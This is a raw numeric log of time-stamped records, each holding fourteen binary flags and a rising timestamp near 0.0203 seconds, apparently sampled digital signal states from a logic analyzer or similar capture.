0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0315656e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0315660e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0315684e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0315708e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0315732e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0315756e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0315804e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0315832e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0315884e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0315908e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0315956e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0315984e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0316032e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0316056e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0316108e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0316132e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0316184e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0316204e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0316232e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0316256e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0316260e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.0316284e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0316308e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.0316332e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0316356e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.0316384e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0316404e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.0316428e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0316456e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.0316484e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0316508e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0316516e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0316532e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0316556e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0316584e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0316604e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0316632e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0316656e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0316684e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0316708e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0316732e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0316756e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0316780e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0316804e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0316812e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.0316832e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0316856e-02 0,1,0,1,0,1,0,0,0,0,0,0,0,0,2.0316860e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0316864e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0316884e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0316908e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0316932e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0316956e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0316980e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0317004e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0317012e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.0317028e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0317056e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.0317084e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0317108e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.0317132e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0317156e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.0317180e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0317204e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0317212e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0317232e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0317256e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0317284e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0317308e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0317356e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0317380e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0317432e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0317456e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0317508e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0317532e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0317580e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0317604e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0317656e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0317684e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0317732e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0317756e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0317780e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0317804e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0317812e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.0317828e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0317856e-02 0,1,0,1,0,1,0,0,0,0,0,0,0,0,2.0317860e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0317864e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0317884e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0317908e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.0317932e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0317956e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.0317980e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0318004e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.0318032e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0318056e-02 0,1,0,1,0,1,0,0,0,0,0,0,0,0,2.0318060e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0318064e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0318084e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0318108e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0318132e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0318156e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0318180e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0318204e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0318212e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.0318232e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0318256e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.0318284e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0318308e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.0318332e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0318356e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.0318380e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0318404e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.0318432e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0318456e-02 0,1,0,1,0,1,0,0,0,0,0,0,0,0,2.0318460e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0318464e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0318484e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0318508e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0318532e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0318556e-02 0,1,0,1,0,0,0,0,0,1,0,0,0,0,2.0318560e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0318564e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.0318580e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0318604e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.0318632e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0318656e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.0318684e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0318708e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.0318732e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0318756e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.0318780e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0318804e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0318812e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0318832e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0318856e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0318860e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.0318884e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0318908e-02 0,1,0,1,0,1,0,0,0,0,0,0,0,0,2.0318912e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0318916e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0318932e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0318956e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0318980e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0319004e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0319032e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0319056e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0319084e-02 0,1,0,1,0,0,0,0,0,1,0,0,0,0,2.0319108e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0319112e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.0319132e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0319156e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0319164e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0319180e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0319204e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0319212e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.0319232e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0319256e-02 0,1,0,1,0,1,0,0,0,0,0,0,0,0,2.0319260e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0319264e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0319284e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0319308e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0319332e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0319356e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0319380e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0319404e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0319432e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0319456e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0319460e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.0319484e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0319508e-02 0,1,0,1,0,1,0,0,0,0,0,0,0,0,2.0319512e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0319516e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0319532e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0319556e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0319580e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0319604e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0319612e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.0319632e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0319656e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.0319684e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0319708e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.0319732e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0319756e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.0319780e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0319804e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0319812e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0319832e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0319856e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0319884e-02 0,1,0,1,0,0,0,0,0,1,0,0,0,0,2.0319908e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0319912e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.0319932e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0319956e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0319964e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0319980e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0320004e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0320032e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0320056e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0320084e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0320108e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0320132e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0320156e-02 0,1,0,1,0,0,0,0,0,1,0,0,0,0,2.0320160e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0320164e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.0320180e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0320204e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0320212e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0320232e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0320256e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0320284e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0320308e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0320332e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0320356e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0320380e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0320404e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0320432e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0320456e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0320484e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0320508e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0320532e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0320556e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0320580e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0320604e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0320628e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0320656e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0320684e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0320708e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0320732e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0320756e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0320780e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0320804e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0320832e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0320856e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0320884e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0320908e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0320932e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0320956e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0320980e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0321004e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0321032e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0321056e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,1,2.0445740e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,1,2.0445948e-02 1,1,0,1,0,0,0,0,0,0,0,1,0,1,2.0445976e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,1,2.0445996e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,1,2.0446292e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,1,2.0446316e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,1,2.0446344e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,1,2.0446368e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,1,2.0446396e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,1,2.0446420e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,1,2.0446444e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,1,2.0446468e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,1,2.0446492e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,1,2.0446516e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,1,2.0446544e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,1,2.0446568e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0446572e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0446596e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0446620e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0446644e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0446668e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0446692e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0446716e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0446744e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0446768e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0446796e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0446820e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0446844e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0446868e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0446892e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0446916e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0446944e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0446968e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0446996e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0447020e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0447044e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0447068e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0447092e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0447116e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0447144e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0447164e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0447196e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0447220e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0447244e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0447268e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0447292e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0447316e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0447344e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0447364e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0447396e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0447420e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0447444e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0447468e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0447492e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0447516e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0447540e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0447564e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0447592e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0447620e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0447644e-02 1,1,0,1,0,0,0,0,0,1,0,0,0,0,2.0447668e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0447672e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,2.0447692e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0447716e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,2.0447740e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0447764e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,2.0447792e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0447820e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,2.0447844e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0447868e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,2.0447892e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0447916e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,2.0447940e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0447964e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0447972e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0447992e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0448020e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0448044e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0448068e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0448092e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0448116e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0448140e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0448164e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0448192e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0448220e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0448244e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0448268e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0448292e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0448316e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0448340e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0448364e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0448392e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0448420e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0448444e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0448468e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0448492e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0448516e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0448540e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0448564e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0448592e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0448616e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0448644e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0448668e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0448692e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0448716e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0448740e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0448764e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0448792e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0448816e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0448844e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0448868e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0448892e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0448916e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0448940e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0448964e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0448992e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0449016e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0449044e-02 1,1,0,1,0,0,0,0,0,1,0,0,0,0,2.0449068e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0449072e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,2.0449092e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0449116e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,2.0449140e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0449164e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,2.0449192e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0449216e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,2.0449244e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0449268e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,2.0449292e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0449316e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,2.0449340e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0449364e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0449372e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0449392e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0449416e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0449444e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0449468e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0449492e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0449516e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0449540e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0449564e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0449592e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0449616e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0449644e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0449668e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0449692e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0449716e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0449740e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0449764e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0449792e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0449816e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0449844e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0449868e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0449892e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0449916e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0449940e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0449964e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0449992e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0450016e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0450044e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0450068e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0450092e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0450116e-02 